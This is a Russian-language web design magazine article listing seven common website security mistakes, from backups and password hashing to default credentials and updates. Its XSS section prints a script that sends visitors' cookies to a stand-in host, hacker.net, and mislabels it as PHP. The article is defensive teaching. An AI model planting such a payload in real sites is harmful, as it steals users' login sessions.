Яндекс.Метрика

Дизайн-журнал №1. Актуальная информация для дизайнеров, веб дизайнеров, программистов и разработчиков сайтов.

Семь ошибок в безопасности вашего сайта

21 августа 2017 | Опубликовано в статьюшечки | 2 Комментариев »

Когда вы работаете над новым сайтом, важно уделять внимание сохранности данным и уязвимостям. Вы сможете спать спокойно, что у вас нет дыр в безопасности. Проводите свои исследования и тестируйте ваш сайт на секьюрити-ошибки. А также в первую очередь обратите внимание на перечисленные в этой статье недостатки, которые могут вам стоить многого.

 

1. Недостаточно частые и надежные бэкапы

Резервное копирования — критически важная процедура для любого онлайн-проекта. Бэкап спасет ваши данные в случае падения системы или пользовательской ошибки. Если вы редко создаете резервные копии или пользуетесь автоматической системой, которую не проверяли, исправьте это прямо сейчас. Когда на кону стоят данные пользователей и ваша репутация, лучше быть уверенным в системе и уметь ею пользоваться.

Для успешной схемы пользуйтесь правилом «3-2-1»: три копии на двух различных медиа-хранилищах, один из которых на удаленном местоположении. Ваш хостинг-провайдер наверняка тоже создает бэкапы, но лучше иметь свои копии, которые вы полностью контролируете.

2. Плохое управление паролями

Вам может казаться что в 2017 году уже никто не хранит пароли в текстовом виде, однако такое случается. Если вы хотите создать безопасные аккаунты для пользователей, и собираетесь писать собственную систему управления паролями, вам нужно использовать проверенный метод шифрования. Таким образом вы избавитесь от текста в изначальном виде, однако остаются такие небезопасные алгоритмы хэширования как MD5. Пользовательские пароли должны храниться только в виде хэш-кодов и никак иначе.

3. Свобода ввода пользовательских данных

Онлайн-приложения задают тон в сети. А любое приложение зависит от введенной пользователем информации. К сожалению приходится признать — как минимум один из ваших посетителей будет иметь злые намерения. Ввод данных становится проблемой безопасности, когда недоброжелатель публикует компьютерный код в качестве комментария в блоге или обновления статуса. Если вы не защищены от подобных действий, ваш сайт будет выполнять этот код, позволяя выполнять непредусмотренные вами действия на вашем сайте. Чтобы избежать такой опасности, вам нужно проводить вводные данные через автоматическую премодерацию. Сделайте так, чтобы любой код введенный пользователем прерывался до выполнения.

4. Межсайтовый скриптинг

Один из способов использования уязвимостей во введенных пользователем данных — межсайтовый скриптинг (XSS-атаки). В этом типе атаки недоброжелатель загружает скрипт на ваш сайт. Этот скрипт выполняется на компьютере у пользователя, высылая ворованные данные хакерам. Вот пример такого кода PHP:

<script>
document.location =
    'http://www.hacker.net/cookie.php?' +
    document.cookie;
</script>

Если загрузить такой код, к примеру на форуме, он будет выполнен в браузере зашедших на форум пользователей, и вышлет атакующему кукисы логина пользователей. Чтобы защититься от подобных нападений, кодируйте специальные символы как HTML-сущности. К примеру, символы <"" и >"" должны быть конвертированы в &lt;"" и &gt;"", ломая любой код внутри. Это не даст вам стопроцентной защиты от XSS-атак, но это хорошее начало.

5. Самостоятельное хранение данных кредитных карт

Возможно ли самостоятельно написать идеально безопасную систему хранения данных кредитных карт? Конечно! Но в этом случае существует вероятность, что хакеры найдут маленькую ошибку, которую вы допустили и получат доступ к тоннам информации о кредитках ваших клиентов. Менее вероятно, но потенциально столь же разрушительно, будет несоответствие строгим и неясным правилам PCI, которые регулируют хранение и обработку кредитной информации.

Короче говоря, не используйте собственноручно написанных систем хранения и применения кредитной информации. Намного безопаснее обратиться к сторонним, проверенным разработчикам, таким как Authorize.net, Stripe или к одному из сертифицированных провайдеров VISA. Ежемесячная плата — небольшая цена за душевное спокойствие и соответствие стандартам PCI.

6. Логины и пароли по умолчанию

Само собой разумеется, что устанавливая софт, систему управления контентом и т. д., вы сразу же меняете автоматически созданные логин и пароль на свои. Это должна быть безоговорочная привычка любого, но это не так. Когда для смены данных по умолчанию нужно почитать FAQ, а ваши данные «никому не нужны», легко убедить себя сохранить дефолтные параметры для удобства. Хакеры надеются на это, и часто имеют в распоряжении целую базу известных паролей по умолчанию для различных систем и приложений. Если они нацелятся на ваш сайт, то вполне вероятно попробуют на для начала стандартные логин/пароль админки WordPress — а вдруг повезет. Не оставляйте такой возможности. Всегда изменяйте данные по умолчанию — сразу же после установки новых систем.

7. Игнорирование обновлений

Новые уязвимости находят постоянно, и софт обновляется чтобы их исправить. Но легко пропустить обновления, особенно если они не происходят автоматически. Вот почему Microsoft не так давно приняли решение производить принудительные обновления Windows 10. Они решили что лучше будут раздражать пользователей, чем оставят их с множеством неисправленных уязвимостей. Если вы администрируете серверы, вы должны быть очень внимательными и дотошными в том, что касается поиска обновлений. Следите за сайтами производителей, подписывайтесь на email-рассылки и оповещения. Ведь важно быть защищенным от всех возможных атак.

Автор статьи ALEX FOX

Перевод — Дежурка

Смотрите также:




Комментарии